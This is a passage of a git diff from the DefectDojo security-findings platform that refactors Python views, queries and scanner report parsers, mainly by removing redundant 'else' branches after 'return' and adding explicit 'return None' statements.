1425985c4cd..ca917968b75 100644 --- a/dojo/templatetags/get_config_setting.py +++ b/dojo/templatetags/get_config_setting.py @@ -9,7 +9,5 @@ def get_config_setting(config_setting): if hasattr(settings, config_setting): if getattr(settings, config_setting, None): return True - else: - return False - else: return False + return False diff --git a/dojo/templatetags/get_endpoint_status.py b/dojo/templatetags/get_endpoint_status.py index 2d9f09d8d14..42a5bdb8eaa 100644 --- a/dojo/templatetags/get_endpoint_status.py +++ b/dojo/templatetags/get_endpoint_status.py @@ -43,8 +43,7 @@ def endpoint_display_status(endpoint, finding): statuses.append("Mitigated") if statuses: return ", ".join(statuses) - else: - return "Active" + return "Active" @register.filter diff --git a/dojo/templatetags/get_note_status.py b/dojo/templatetags/get_note_status.py index ab5b6485858..5d719f427c7 100644 --- a/dojo/templatetags/get_note_status.py +++ b/dojo/templatetags/get_note_status.py @@ -7,3 +7,4 @@ def get_public_notes(notes): if notes: return notes.filter(private=False) + return None diff --git a/dojo/templatetags/get_notetype_availability.py b/dojo/templatetags/get_notetype_availability.py index 59673b3a4e9..4947d9a5e0f 100644 --- a/dojo/templatetags/get_notetype_availability.py +++ b/dojo/templatetags/get_notetype_availability.py @@ -7,6 +7,4 @@ def get_notetype_notes_count(notes): notes_without_type = notes.filter(note_type=None).count() notes_count = notes.count() - notes_with_type = notes_count - notes_without_type - - return notes_with_type + return notes_count - notes_without_type diff --git a/dojo/test/queries.py b/dojo/test/queries.py index 2a2cef6f8d9..28a9249d543 100644 --- a/dojo/test/queries.py +++ b/dojo/test/queries.py @@ -46,14 +46,12 @@ def get_authorized_tests(permission, product=None): engagement__product__prod_type__authorized_group=Exists(authorized_product_type_groups), engagement__product__authorized_group=Exists(authorized_product_groups)) - tests = tests.filter( + return tests.filter( Q(engagement__product__prod_type__member=True) | Q(engagement__product__member=True) | Q(engagement__product__prod_type__authorized_group=True) | Q(engagement__product__authorized_group=True)) - return tests - def get_authorized_test_imports(permission): user = get_current_user() @@ -89,10 +87,8 @@ def get_authorized_test_imports(permission): test__engagement__product__member=Exists(authorized_product_roles), test__engagement__product__prod_type__authorized_group=Exists(authorized_product_type_groups), test__engagement__product__authorized_group=Exists(authorized_product_groups)).order_by("id") - test_imports = test_imports.filter( + return test_imports.filter( Q(test__engagement__product__prod_type__member=True) | Q(test__engagement__product__member=True) | Q(test__engagement__product__prod_type__authorized_group=True) | Q(test__engagement__product__authorized_group=True)) - - return test_imports diff --git a/dojo/test/views.py b/dojo/test/views.py index ee492cf5505..b93ebe12933 100644 --- a/dojo/test/views.py +++ b/dojo/test/views.py @@ -381,12 +381,11 @@ def copy_test(request, tid): recipients=[test.engagement.lead], icon="exclamation-triangle") return redirect_to_return_url_or_else(request, reverse("view_engagement", args=(engagement.id, ))) - else: - messages.add_message( - request, - messages.ERROR, - "Unable to copy test, please try again.", - extra_tags="alert-danger") + messages.add_message( + request, + messages.ERROR, + "Unable to copy test, please try again.", + extra_tags="alert-danger") product_tab = Product_Tab(product, title="Copy Test", tab="engagements") return render(request, "dojo/copy_object.html", { @@ -547,9 +546,8 @@ def process_finding_form(self, request: HttpRequest, test: Test, context: dict): finding.save() return finding, request, True - else: - add_error_message_to_response("The form has errors, please correct them below.") - add_field_errors_to_response(context["form"]) + add_error_message_to_response("The form has errors, please correct them below.") + add_field_errors_to_response(context["form"]) return finding, request, False @@ -591,8 +589,7 @@ def process_jira_form(self, request: HttpRequest, finding: Finding, context: dic ) return request, True, push_to_jira - else: - add_field_errors_to_response(context["jform"]) + add_field_errors_to_response(context["jform"]) return request, False, False @@ -672,10 +669,8 @@ def post(self, request: HttpRequest, test_id: int): if success: if "_Finished" in request.POST: return HttpResponseRedirect(reverse("view_test", args=(test.id,))) - else: - return HttpResponseRedirect(reverse("add_findings", args=(test.id,))) - else: - context["form_error"] = True + return HttpResponseRedirect(reverse("add_findings", args=(test.id,))) + context["form_error"] = True # Render the form return render(request, self.get_template(), context) @@ -754,11 +749,10 @@ def add_temp_finding(request, tid, fid): extra_tags="alert-success") return HttpResponseRedirect(reverse("view_test", args=(test.id,))) - else: - messages.add_message(request, - messages.ERROR, - _("The form has errors, please correct them below."), - extra_tags="alert-danger") + messages.add_message(request, + messages.ERROR, + _("The form has errors, please correct them below."), + extra_tags="alert-danger") else: form = AddFindingForm(req_resp=None, product=test.engagement.product, initial={"active": False, @@ -830,8 +824,7 @@ def get_form( """ if request.method == "POST": return ReImportScanForm(request.POST, request.FILES, test=test, **kwargs) - else: - return ReImportScanForm(test=test, **kwargs) + return ReImportScanForm(test=test, **kwargs) def get_jira_form( self, diff --git a/dojo/tool_config/factory.py b/dojo/tool_config/factory.py index 61fce9caa51..3715a52906f 100644 --- a/dojo/tool_config/factory.py +++ b/dojo/tool_config/factory.py @@ -19,5 +19,4 @@ def create_API(tool_configuration): if tool_configuration.tool_type.name in SCAN_APIS: api_class = SCAN_APIS.get(tool_configuration.tool_type.name) return api_class(tool_configuration) - else: - return None + return None diff --git a/dojo/tool_product/queries.py b/dojo/tool_product/queries.py index 6bc23bdb98b..df95594688b 100644 --- a/dojo/tool_product/queries.py +++ b/dojo/tool_product/queries.py @@ -39,8 +39,6 @@ def get_authorized_tool_product_settings(permission): product__member=Exists(authorized_product_roles), product__prod_type__authorized_group=Exists(authorized_product_type_groups), product__authorized_group=Exists(authorized_product_groups)).order_by("id") - tool_product_settings = tool_product_settings.filter( + return tool_product_settings.filter( Q(product__prod_type__member=True) | Q(product__member=True) | Q(product__prod_type__authorized_group=True) | Q(product__authorized_group=True)) - - return tool_product_settings diff --git a/dojo/tool_product/views.py b/dojo/tool_product/views.py index 2e606956b8e..def26f088d2 100644 --- a/dojo/tool_product/views.py +++ b/dojo/tool_product/views.py @@ -102,8 +102,7 @@ def delete_tool_product(request, pid, ttid): _("Tool Product Successfully Deleted."), extra_tags="alert-success") return HttpResponseRedirect(reverse("all_tool_product", args=(pid, ))) - else: - tform = ToolProductSettingsForm(instance=tool_product) + tform = ToolProductSettingsForm(instance=tool_product) product_tab = Product_Tab(product, title=_("Delete Product Tool Configuration"), tab="settings") diff --git a/dojo/tools/acunetix/parse_acunetix_xml.py b/dojo/tools/acunetix/parse_acunetix_xml.py index 22171bf24b1..4b86d947318 100644 --- a/dojo/tools/acunetix/parse_acunetix_xml.py +++ b/dojo/tools/acunetix/parse_acunetix_xml.py @@ -145,8 +145,7 @@ def get_cwe_number(self, cwe): """ if cwe is None: return None - else: - return int(cwe.split("-")[1]) + return int(cwe.split("-")[1]) def get_severity(self, severity): """ @@ -156,14 +155,13 @@ def get_severity(self, severity): """ if severity == "high": return "High" - elif severity == "medium": + if severity == "medium": return "Medium" - elif severity == "low": + if severity == "low": return "Low" - elif severity == "informational": + if severity == "informational": return "Info" - else: - return "Critical" + return "Critical" def get_false_positive(self, false_p): """ @@ -173,5 +171,4 @@ def get_false_positive(self, false_p): """ if false_p: return True - else: - return False + return False diff --git a/dojo/tools/acunetix/parser.py b/dojo/tools/acunetix/parser.py index 289496a03f8..789fc23607d 100644 --- a/dojo/tools/acunetix/parser.py +++ b/dojo/tools/acunetix/parser.py @@ -17,5 +17,6 @@ def get_description_for_scan_types(self, scan_type): def get_findings(self, filename, test): if ".xml" in str(filename): return AcunetixXMLParser().get_findings(filename, test) - elif ".json" in str(filename): + if ".json" in str(filename): return AcunetixJSONParser().get_findings(filename, test) + return None diff --git a/dojo/tools/anchore_grype/parser.py b/dojo/tools/anchore_grype/parser.py index c457f63e65f..48e18b686e0 100644 --- a/dojo/tools/anchore_grype/parser.py +++ b/dojo/tools/anchore_grype/parser.py @@ -187,10 +187,9 @@ def get_findings(self, file, test): def _convert_severity(self, val): if "Unknown" == val: return "Info" - elif "Negligible" == val: + if "Negligible" == val: return "Info" - else: - return val.title() + return val.title() def get_cvss(self, cvss): if cvss: @@ -213,5 +212,4 @@ def get_vulnerability_ids(self, vuln_id, related_vulnerabilities): vulnerability_ids.append(related_vulnerability.get("id")) if vulnerability_ids: return vulnerability_ids - else: - return None + return None diff --git a/dojo/tools/api_blackduck/api_client.py b/dojo/tools/api_blackduck/api_client.py index 47a49643b11..b354f85d753 100644 --- a/dojo/tools/api_blackduck/api_client.py +++ b/dojo/tools/api_blackduck/api_client.py @@ -36,11 +36,13 @@ def get_project_by_name(self, project_name): for project in self.client.get_resource("projects"): if project["name"] == project_name: return project + return None def get_version_by_name(self, project, version_name): for version in self.client.get_resource("versions", project): if version["versionName"] == version_name: return version + return None def get_vulnerable_bom_components(self, version): return self.client.get_resource("vulnerable-components", version) diff --git a/dojo/tools/api_bugcrowd/api_client.py b/dojo/tools/api_bugcrowd/api_client.py index bf76608380d..68e73367d1b 100644 --- a/dojo/tools/api_bugcrowd/api_client.py +++ b/dojo/tools/api_bugcrowd/api_client.py @@ -112,18 +112,16 @@ def test_connection(self): f"you can use these as Service key 1 for filtering submissions " f'You also have targets "{target_names}" that can be used in Service key 2' ) - else: - msg = ( - "Bugcrowd API test not successful, no targets were defined in Bugcrowd which is used for " - f"filtering, check your configuration, HTTP response was: {response_targets.text}" - ) - raise Exception(msg) - else: msg = ( - "Bugcrowd API test not successful, could not retrieve the programs or submissions, check your " - f"configuration, HTTP response for programs was: {response_programs.text}, HTTP response for submissions was: {response_subs.text}" + "Bugcrowd API test not successful, no targets were defined in Bugcrowd which is used for " + f"filtering, check your configuration, HTTP response was: {response_targets.text}" ) raise Exception(msg) + msg = ( + "Bugcrowd API test not successful, could not retrieve the programs or submissions, check your " + f"configuration, HTTP response for programs was: {response_programs.text}, HTTP response for submissions was: {response_subs.text}" + ) + raise Exception(msg) def test_product_connection(self, api_scan_configuration): submissions = [] diff --git a/dojo/tools/api_bugcrowd/parser.py b/dojo/tools/api_bugcrowd/parser.py index f6e2fa134b2..bbff76ef4b8 100644 --- a/dojo/tools/api_bugcrowd/parser.py +++ b/dojo/tools/api_bugcrowd/parser.py @@ -195,13 +195,12 @@ def include_finding(self, entry): if entry["attributes"]["state"] in allowed_states: return True - else: - msg = ( - "{} not in allowed bugcrowd submission states".format( - entry["attributes"]["state"], - ) + msg = ( + "{} not in allowed bugcrowd submission states".format( + entry["attributes"]["state"], ) - raise ValueError(msg) + ) + raise ValueError(msg) def convert_log_timestamp(self, timestamp): """Convert a log entry's timestamp to a DefectDojo date""" @@ -212,16 +211,15 @@ def convert_severity(self, bugcrowd_severity): """Convert severity value""" if bugcrowd_severity == 5: return "Info" - elif bugcrowd_severity == 4: + if bugcrowd_severity == 4: return "Low" - elif bugcrowd_severity == 3: + if bugcrowd_severity == 3: return "Medium" - elif bugcrowd_severity == 2: + if bugcrowd_severity == 2: return "High" - elif bugcrowd_severity == 1: + if bugcrowd_severity == 1: return "Critical" - else: - return "Info" + return "Info" def is_active(self, bugcrowd_state): return (bugcrowd_state == "unresolved") or not ( diff --git a/dojo/tools/api_cobalt/api_client.py b/dojo/tools/api_cobalt/api_client.py index c18234ae73d..0161715c73c 100644 --- a/dojo/tools/api_cobalt/api_client.py +++ b/dojo/tools/api_cobalt/api_client.py @@ -41,13 +41,12 @@ def get_assets(self): if response.ok: return response.json().get("data") - else: - msg = ( - "Unable to get assets due to {} - {}".format( - response.status_code, response.content.decode("utf-8"), - ) + msg = ( + "Unable to get assets due to {} - {}".format( + response.status_code, response.content.decode("utf-8"), ) - raise Exception(msg) + ) + raise Exception(msg) def get_findings(self, asset_id): """ @@ -62,13 +61,12 @@ def get_findings(self, asset_id): if response.ok: return response.json() - else: - msg = ( - "Unable to get asset findings due to {} - {}".format( - response.status_code, response.content.decode("utf-8"), - ) + msg = ( + "Unable to get asset findings due to {} - {}".format( + response.status_code, response.content.decode("utf-8"), ) - raise Exception(msg) + ) + raise Exception(msg) def test_connection(self): # Request orgs for the org name @@ -91,14 +89,13 @@ def test_connection(self): org = list(orgs)[0] org_name = org["resource"]["name"] return f'You have access to the "{org_name}" organization' - else: - msg = ( - "Connection failed (error: {} - {})".format( - response_assets.status_code, - response_assets.content.decode("utf-8"), - ) + msg = ( + "Connection failed (error: {} - {})".format( + response_assets.status_code, + response_assets.content.decode("utf-8"), ) - raise Exception(msg) + ) + raise Exception(msg) def test_product_connection(self, api_scan_configuration): asset = self.get_asset(api_scan_configuration.service_key_1) diff --git a/dojo/tools/api_cobalt/importer.py b/dojo/tools/api_cobalt/importer.py index 068745cfee7..8c74c6c8cfe 100644 --- a/dojo/tools/api_cobalt/importer.py +++ b/dojo/tools/api_cobalt/importer.py @@ -16,8 +16,7 @@ class CobaltApiImporter: def get_findings(self, test): client, config = self.prepare_client(test) - findings = client.get_findings(config.service_key_1) - return findings + return client.get_findings(config.service_key_1) def prepare_client(self, test): product = test.engagement.product diff --git a/dojo/tools/api_cobalt/parser.py b/dojo/tools/api_cobalt/parser.py index fa82acabf53..5ec50de6c45 100644 --- a/dojo/tools/api_cobalt/parser.py +++ b/dojo/tools/api_cobalt/parser.py @@ -132,8 +132,7 @@ def include_finding(self, resource): if resource["state"] in allowed_states: return True - else: - return False + return False def convert_endpoints(self, affected_targets): """Convert Cobalt affected_targets into DefectDojo endpoints""" @@ -152,16 +151,15 @@ def convert_severity(self, cobalt_severity): """Convert severity value""" if cobalt_severity == "informational": return "Info" - elif cobalt_severity == "low": + if cobalt_severity == "low": return "Low" - elif cobalt_severity == "medium": + if cobalt_severity == "medium": return "Medium" - elif cobalt_severity == "high": + if cobalt_severity == "high": return "High" - elif cobalt_severity == "critical": + if cobalt_severity == "critical": return "Critical" - else: - return "Info" + return "Info" def is_active(self, cobalt_state): return ( diff --git a/dojo/tools/api_edgescan/api_client.py b/dojo/tools/api_edgescan/api_client.py index e74c6b94095..c7fdc735172 100644 --- a/dojo/tools/api_edgescan/api_client.py +++ b/dojo/tools/api_edgescan/api_client.py @@ -28,6 +28,7 @@ def get_extra_options(tool_config): except (JSONDecodeError, TypeError): msg = "JSON not provided in Extras field." raise ValueError(msg) + return None def get_findings(self, asset_ids): if asset_ids: @@ -47,14 +48,12 @@ def get_findings(self, asset_ids): return response.json() def get_headers(self): - headers = { + return { "X-API-TOKEN": self.api_key, "Content-Type": "application/json", "User-Agent": "DefectDojo", } - return headers - def get_proxies(self): if self.options and "proxy" in self.options: return {"https": self.options["proxy"]} diff --git a/dojo/tools/api_edgescan/importer.py b/dojo/tools/api_edgescan/importer.py index e4e9bf0c98e..6d1ca4de90d 100644 --- a/dojo/tools/api_edgescan/importer.py +++ b/dojo/tools/api_edgescan/importer.py @@ -12,8 +12,7 @@ class EdgescanImporter: def get_findings(self, test): client, config = self.prepare_client(test) - findings = client.get_findings(config.service_key_1) - return findings + return client.get_findings(config.service_key_1) def prepare_client(self, test): product = test.engagement.product diff --git a/dojo/tools/api_sonarqube/importer.py b/dojo/tools/api_sonarqube/importer.py index 567454961eb..7e5856707d4 100644 --- a/dojo/tools/api_sonarqube/importer.py +++ b/dojo/tools/api_sonarqube/importer.py @@ -356,32 +356,31 @@ def clean_cwe(raw_html): search = re.search(r"CWE-(\d+)", raw_html) if search: return int(search.group(1)) + return None @staticmethod def convert_sonar_severity(sonar_severity): sev = sonar_severity.lower() if sev == "blocker": return "Critical" - elif sev == "critical": + if sev == "critical": return "High" - elif sev == "major": + if sev == "major": return "Medium" - elif sev == "minor": + if sev == "minor": return "Low" - else: - return "Info" + return "Info" @staticmethod def convert_scanner_confidence(sonar_scanner_confidence): sev = sonar_scanner_confidence.lower() if sev == "high": return 1 - elif sev == "medium": + if sev == "medium": return 4 - elif sev == "low": - return 7 - else: + if sev == "low": return 7 + return 7 @staticmethod def get_references(vuln_details): diff --git a/dojo/tools/api_sonarqube/updater.py b/dojo/tools/api_sonarqube/updater.py index 980079f8942..c8bcd7e0664 100644 --- a/dojo/tools/api_sonarqube/updater.py +++ b/dojo/tools/api_sonarqube/updater.py @@ -72,7 +72,7 @@ def get_sonarqube_required_transitions_for( ): # If current and target is the same... do nothing if current_status == target_status: - return + return None # Check if there is at least one transition from current_status... if not [ @@ -80,7 +80,7 @@ def get_sonarqube_required_transitions_for( for x in self.MAPPING_SONARQUBE_STATUS_TRANSITION if current_status in x.get("from") ]: - return + return None # Starting from target_status... find out possible origin statuses that # can transition to target_status @@ -113,6 +113,8 @@ def get_sonarqube_required_transitions_for( if possible_transition: transitions_result.extendleft(possible_transition) return list(transitions_result) + return None + return None def update_sonarqube_finding(self, finding): sonarqube_issue = finding.sonarqube_issue diff --git a/dojo/tools/api_vulners/importer.py b/dojo/tools/api_vulners/importer.py index 8ebbbe83f60..0b49306f7e9 100644 --- a/dojo/tools/api_vulners/importer.py +++ b/dojo/tools/api_vulners/importer.py @@ -16,13 +16,11 @@ class VulnersImporter: def get_findings(self, test): client, _config = self.prepare_client(test) - findings = client.get_findings() - return findings + return client.get_findings() def get_vulns_description(self, test, vulns_id): client, _config = self.prepare_client(test) - description = client.get_vulns_description(vulns_id) - return description + return client.get_vulns_description(vulns_id) def prepare_client(self, test): product = test.engagement.product diff --git a/dojo/tools/appspider/parser.py b/dojo/tools/appspider/parser.py index bf9ed6eb415..d6ccf54611c 100644 --- a/dojo/tools/appspider/parser.py +++ b/dojo/tools/appspider/parser.py @@ -18,7 +18,7 @@ def get_description_for_scan_types(self, scan_type): def get_findings(self, filename, test): if filename is None: - return + return None vscan = ElementTree.parse(filename) root = vscan.getroot() diff --git a/dojo/tools/aqua/parser.py b/dojo/tools/aqua/parser.py index 8dc92dd14d1..076c2d71dc5 100644 --- a/dojo/tools/aqua/parser.py +++ b/dojo/tools/aqua/parser.py @@ -204,22 +204,20 @@ def aqua_severity_of(score): return "High" if score == "medium": return "Medium" - elif score == "low": + if score == "low": return "Low" - elif score == "negligible": + if score == "negligible": return "Info" - else: - return "Critical" + return "Critical" def severity_of(score): if score == 0: return "Info" - elif score < 4: + if score < 4: return "Low" - elif 4.0 < score < 7.0: + if 4.0 < score < 7.0: return "Medium" - elif 7.0 < score < 9.0: + if 7.0 < score < 9.0: return "High" - else: - return "Critical" + return "Critical" diff --git a/dojo/tools/asff/parser.py b/dojo/tools/asff/parser.py index 74630290638..ccd5eb3110c 100644 --- a/dojo/tools/asff/parser.py +++ b/dojo/tools/asff/parser.py @@ -116,7 +116,7 @@ def get_findings(self, file, test): def get_severity(self, data): if data.get("Label"): return SEVERITY_MAPPING[data.get("Label")] - elif isinstance(data.get("Normalized"), int): + if isinstance(data.get("Normalized"), int): # 0 - INFORMATIONAL # 1-39 - LOW # 40-69 - MEDIUM @@ -124,12 +124,11 @@ def get_severity(self, data): # 90-100 - CRITICAL if data.get("Normalized") > 89: return "Critical" - elif data.get("Normalized") > 69: + if data.get("Normalized") > 69: return "High" - elif data.get("Normalized") > 39: + if data.get("Normalized") > 39: return "Medium" - elif data.get("Normalized") > 0: + if data.get("Normalized") > 0: return "Low" - else: - return "Info" + return "Info" return None diff --git a/dojo/tools/auditjs/parser.py b/dojo/tools/auditjs/parser.py index 8135fe1fc55..6299308f79c 100644 --- a/dojo/tools/auditjs/parser.py +++ b/dojo/tools/auditjs/parser.py @@ -25,14 +25,13 @@ def get_severity(self, cvss): cvss = float(cvss) if cvss > 0 and cvss < 4: return "Low" - elif cvss >= 4 and cvss < 7: + if cvss >= 4 and cvss < 7: return "Medium" - elif cvss >= 7 and cvss < 9: + if cvss >= 7 and cvss < 9: return "High" - elif cvss >= 9: + if cvss >= 9: return "Critical" - else: - return "Informational" + return "Informational" def get_findings(self, filename, test): try: diff --git a/dojo/tools/aws_prowler/parser.py b/dojo/tools/aws_prowler/parser.py index 8a084ff6f37..7093a596012 100644 --- a/dojo/tools/aws_prowler/parser.py +++ b/dojo/tools/aws_prowler/parser.py @@ -23,11 +23,10 @@ def get_description_for_scan_types(self, scan_type): def get_findings(self, file, test): if file.name.lower().endswith(".csv"): return self.process_csv(file, test) - elif file.name.lower().endswith(".json"): + if file.name.lower().endswith(".json"): return self.process_json(file, test) - else: - msg = "Unknown file format" - raise ValueError(msg) + msg = "Unknown file format" + raise ValueError(msg) def process_csv(self, file, test): content = file.read() @@ -218,8 +217,7 @@ def process_json(self, file, test): def formatview(self, depth): if depth > 1: return "* " - else: - return "" + return "" # Criticality rating def getCriticalityRating(self, result, level, severity): @@ -233,10 +231,9 @@ def getCriticalityRating(self, result, level, severity): if severity == "Informational": return "Low" return severity + if level == "Level 1": + criticality = "Critical" else: - if level == "Level 1": - criticality = "Critical" - else: - criticality = "High" + criticality = "High" return criticality diff --git a/dojo/tools/aws_prowler_v3plus/parser.py b/dojo/tools/aws_prowler_v3plus/parser.py index 5d550dcf5c6..c764667dfb4 100644 --- a/dojo/tools/aws_prowler_v3plus/parser.py +++ b/dojo/tools/aws_prowler_v3plus/parser.py @@ -17,8 +17,7 @@ def get_description_for_scan_types(self, scan_type): def get_findings(self, file, test): if file.name.lower().endswith(".ocsf.json"): return AWSProwlerV4Parser().process_ocsf_json(file, test) - elif file.name.lower().endswith(".json"): + if file.name.lower().endswith(".json"): return AWSProwlerV3Parser().process_json(file, test) - else: - msg = "Unknown file format" - raise ValueError(msg) + msg = "Unknown file format" + raise ValueError(msg) diff --git a/dojo/tools/azure_security_center_recommendations/parser.py b/dojo/tools/azure_security_center_recommendations/parser.py index 7fbfac83c91..9838f65ae58 100644 --- a/dojo/tools/azure_security_center_recommendations/parser.py +++ b/dojo/tools/azure_security_center_recommendations/parser.py @@ -22,9 +22,8 @@ def get_description_for_scan_types(self, scan_type): def get_findings(self, file, test): if file.name.lower().endswith(".csv"): return self.process_csv(file, test) - else: - msg = "Unknown file format" - raise ValueError(msg) + msg = "Unknown file format" + raise ValueError(msg) def process_csv(self, file, test): content = file.read() diff --git a/dojo/tools/bandit/parser.py b/dojo/tools/bandit/parser.py index 1ad385114ac..3e4e54fcd8b 100644 --- a/dojo/tools/bandit/parser.py +++ b/dojo/tools/bandit/parser.py @@ -66,9 +66,8 @@ def get_findings(self, filename, test): def convert_confidence(self, value): if "high" == value.lower(): return 2 - elif "medium" == value.lower(): + if "medium" == value.lower(): return 3 - elif "low" == value.lower(): + if "low" == value.lower(): return 6 - else: - return None + return None diff --git a/dojo/tools/bearer_cli/parser.py b/dojo/tools/bearer_cli/parser.py index 4f91bb8632a..6484fd66269 100644 --- a/dojo/tools/bearer_cli/parser.py +++ b/dojo/tools/bearer_cli/parser.py @@ -29,8 +29,7 @@ def get_findings(self, file, test): if bearerfinding["fingerprint"] in dupes: continue - else: - dupes.add(bearerfinding["fingerprint"]) + dupes.add(bearerfinding["fingerprint"]) finding = Finding( title=bearerfinding["title"] + " in " + bearerfinding["filename"] + ":" + str(bearerfinding["line_number"]), diff --git a/dojo/tools/blackduck/importer.py b/dojo/tools/blackduck/importer.py index 3e7cde7abe7..80db2714490 100644 --- a/dojo/tools/blackduck/importer.py +++ b/dojo/tools/blackduck/importer.py @@ -24,8 +24,7 @@ def parse_findings(self, report: Path) -> Iterable[BlackduckFinding]: if zipfile.is_zipfile(str(report)): return self._process_zipfile(report) - else: - return self._process_csvfile(report) + return self._process_csvfile(report) def _process_csvfile(self, report): """ diff --git a/dojo/tools/blackduck/parser.py b/dojo/tools/blackduck/parser.py index a79e9db9677..d462f7207b3 100644 --- a/dojo/tools/blackduck/parser.py +++ b/dojo/tools/blackduck/parser.py @@ -28,10 +28,9 @@ def get_findings(self, filename, test): def normalize_findings(self, filename): importer = BlackduckImporter() - findings = sorted( + return sorted( importer.parse_findings(filename), key=lambda f: f.vuln_id, ) - return findings def ingest_findings(self, normalized_findings, test): dupes = {} diff --git a/dojo/tools/blackduck_binary_analysis/parser.py b/dojo/tools/blackduck_binary_analysis/parser.py index 7e545e67517..b9b2e6ab655 100644 --- a/dojo/tools/blackduck_binary_analysis/parser.py +++ b/dojo/tools/blackduck_binary_analysis/parser.py @@ -29,10 +29,9 @@ def get_findings(self, filename, test): def sort_findings(self, filename): importer = BlackduckBinaryAnalysisImporter() - findings = sorted( + return sorted( importer.parse_findings(filename), key=lambda f: f.cve, ) - return findings def ingest_findings(self, sorted_findings, test): findings = {} @@ -138,9 +137,7 @@ def format_description(self, i): return description def format_mitigation(self, i): - mitigation = f"Upgrade {str(i.component)} to latest version: {str(i.latest_version)}.\n" - - return mitigation + return f"Upgrade {str(i.component)} to latest version: {str(i.latest_version)}.\n" def format_impact(self, i): impact = "The use of vulnerable third-party open source software in applications can have numerous negative impacts:\n\n" diff --git a/dojo/tools/blackduck_component_risk/importer.py b/dojo/tools/blackduck_component_risk/importer.py index 5478fa0d51b..c33fa7fd671 100644 --- a/dojo/tools/blackduck_component_risk/importer.py +++ b/dojo/tools/blackduck_component_risk/importer.py @@ -29,9 +29,8 @@ def parse_findings(self, report: Path) -> (dict, dict, dict): report = Path(report.temporary_file_path()) if zipfile.is_zipfile(str(report)): return self._process_zipfile(report) - else: - msg = f"File {report} not a zip!" - raise ValueError(msg) + msg = f"File {report} not a zip!" + raise ValueError(msg) def _process_zipfile(self, report: Path) -> (dict, dict, dict): """ diff --git a/dojo/tools/blackduck_component_risk/parser.py b/dojo/tools/blackduck_component_risk/parser.py index 60003fb4093..270b3481725 100644 --- a/dojo/tools/blackduck_component_risk/parser.py +++ b/dojo/tools/blackduck_component_risk/parser.py @@ -206,10 +206,9 @@ def security_title(self, vulns): :param vulns: Dictionary {component_version_identifier: [vulns]} :return: """ - title = "Security Risk: {}:{}".format( + return "Security Risk: {}:{}".format( vulns[0]["Component name"], vulns[0]["Component version name"], ) - return title def security_description(self, vulns): """ @@ -289,10 +288,9 @@ def security_mitigation(self, vulns): :param vulns: Dictionary {component_version_identifier: [vulns]} :return: """ - mit = "Update component {}:{} to a secure version".format( + return "Update component {}:{} to a secure version".format( vulns[0]["Component name"], vulns[0]["Component version name"], ) - return mit def security_impact(self, vulns): """ diff --git a/dojo/tools/burp_api/parser.py b/dojo/tools/burp_api/parser.py index ec801d8e285..c54726f384e 100644 --- a/dojo/tools/burp_api/parser.py +++ b/dojo/tools/burp_api/parser.py @@ -159,9 +159,8 @@ def convert_confidence(issue): value = issue.get("confidence", "undefined").lower() if "certain" == value: return 2 - elif "firm" == value: + if "firm" == value: return 3 - elif "tentative" == value: + if "tentative" == value: return 6 - else: - return None + return None diff --git a/dojo/tools/burp_enterprise/parser.py b/dojo/tools/burp_enterprise/parser.py index b652dda32c9..aab8e565242 100644 --- a/dojo/tools/burp_enterprise/parser.py +++ b/dojo/tools/burp_enterprise/parser.py @@ -23,8 +23,7 @@ def get_findings(self, filename, test): tree = etree.parse(filename, parser) if tree: return self.get_items(tree, test) - else: - return () + return () def get_content(self, container): s = "" @@ -193,8 +192,7 @@ def get_cwe(self, vuln_references): cweSearch = re.search("CWE-([0-9]*)", vuln_references, re.IGNORECASE) if cweSearch: return cweSearch.group(1) - else: - return 0 + return 0 def create_findings(self, items, test): # Dictonary to hold the aggregated findings with: diff --git a/dojo/tools/burp_graphql/parser.py b/dojo/tools/burp_graphql/parser.py index c0266941222..9b37760e2a8 100644 --- a/dojo/tools/burp_graphql/parser.py +++ b/dojo/tools/burp_graphql/parser.py @@ -222,5 +222,4 @@ def get_cwe(self, cwe_html): cweSearch = re.search("CWE-([0-9]*)", cwe_html, re.IGNORECASE) if cweSearch: return cweSearch.group(1) - else: - return 0 + return 0 diff --git a/dojo/tools/checkmarx/parser.py b/dojo/tools/checkmarx/parser.py index 02e242c0d12..c278612344e 100644 --- a/dojo/tools/checkmarx/parser.py +++ b/dojo/tools/checkmarx/parser.py @@ -21,8 +21,7 @@ def get_label_for_scan_types(self, scan_type): def get_description_for_scan_types(self, scan_type): if scan_type == "Checkmarx Scan": return "Simple Report. Aggregates vulnerabilities per categories, cwe, name, sinkFilename" - else: - return "Detailed Report. Import all vulnerabilities from checkmarx without aggregation" + return "Detailed Report. Import all vulnerabilities from checkmarx without aggregation" # mode: # None (default): aggregates vulnerabilites per sink filename (legacy behavior) @@ -333,8 +332,7 @@ def get_description_detailed(self, pathnode, findingdetail): codefragment.find("Code").text.strip(), ) - findingdetail = f"{findingdetail}-----\n" - return findingdetail + return f"{findingdetail}-----\n" # Get name, cwe and categories from the global query tag (1 query = 1 type # of vulnerability) @@ -362,16 +360,14 @@ def isVerified(self, state): def get_findings(self, file, test): if file.name.strip().lower().endswith(".json"): return self._get_findings_json(file, test) - else: - return self._get_findings_xml(file, test) + return self._get_findings_xml(file, test) def _parse_date(self, value): if isinstance(value, str): return parser.parse(value).date() - elif isinstance(value, dict) and isinstance(value.get("seconds"), int): + if isinstance(value, dict) and isinstance(value.get("seconds"), int): return datetime.datetime.utcfromtimestamp(value.get("seconds")).date() - else: - return None + return None def _get_findings_json(self, file, test): """""" diff --git a/dojo/tools/checkmarx_one/parser.py b/dojo/tools/checkmarx_one/parser.py index 64c52c763f1..a48023e5d6f 100644 --- a/dojo/tools/checkmarx_one/parser.py +++ b/dojo/tools/checkmarx_one/parser.py @@ -22,22 +22,19 @@ def get_description_for_scan_types(self, scan_type): def _parse_date(self, value): if isinstance(value, str): return parser.parse(value) - elif isinstance(value, dict) and isinstance(value.get("seconds"), int): + if isinstance(value, dict) and isinstance(value.get("seconds"), int): return datetime.datetime.utcfromtimestamp(value.get("seconds")) - else: - return None + return None def _parse_cwe(self, cwe): if isinstance(cwe, str): cwe_num = re.findall(r"\d+", cwe) if cwe_num: return cwe_num[0] - else: - return None - elif isinstance(cwe, int): - return cwe - else: return None + if isinstance(cwe, int): + return cwe + return None def parse_vulnerabilities_from_scan_list( self, @@ -114,8 +111,7 @@ def parse_sca_vulnerabilities( cwe_store: list, ) -> List[Finding]: # Not implemented yet - findings = [] - return findings + return [] def parse_sast_vulnerabilities( self, diff --git a/dojo/tools/chefinspect/parser.py b/dojo/tools/chefinspect/parser.py index 06769d4d033..aeb256345e1 100644 --- a/dojo/tools/chefinspect/parser.py +++ 